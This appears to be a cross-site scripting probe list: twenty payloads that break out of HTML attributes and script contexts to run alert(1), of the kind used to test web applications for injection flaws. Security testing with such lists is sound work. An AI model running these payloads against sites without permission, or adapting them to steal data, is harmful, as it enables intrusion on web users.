# Basic reflected/stored XSS probes
<script>alert(1)</script>
<script>alert(document.domain)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<svg/onload=alert(1)>
<body onload=alert(1)>
javascript:alert(1)
"><img src=x onerror=alert(1)>
<iframe src=javascript:alert(1)>
<a href="javascript:alert(1)">x</a>
<details open ontoggle=alert(1)>
"onmouseover="alert(1)
" autofocus onfocus=alert(1) "
<marquee onstart=alert(1)>
<video><source onerror=alert(1)>
';alert(1)//
</script><script>alert(1)</script>
<input onfocus=alert(1) autofocus>
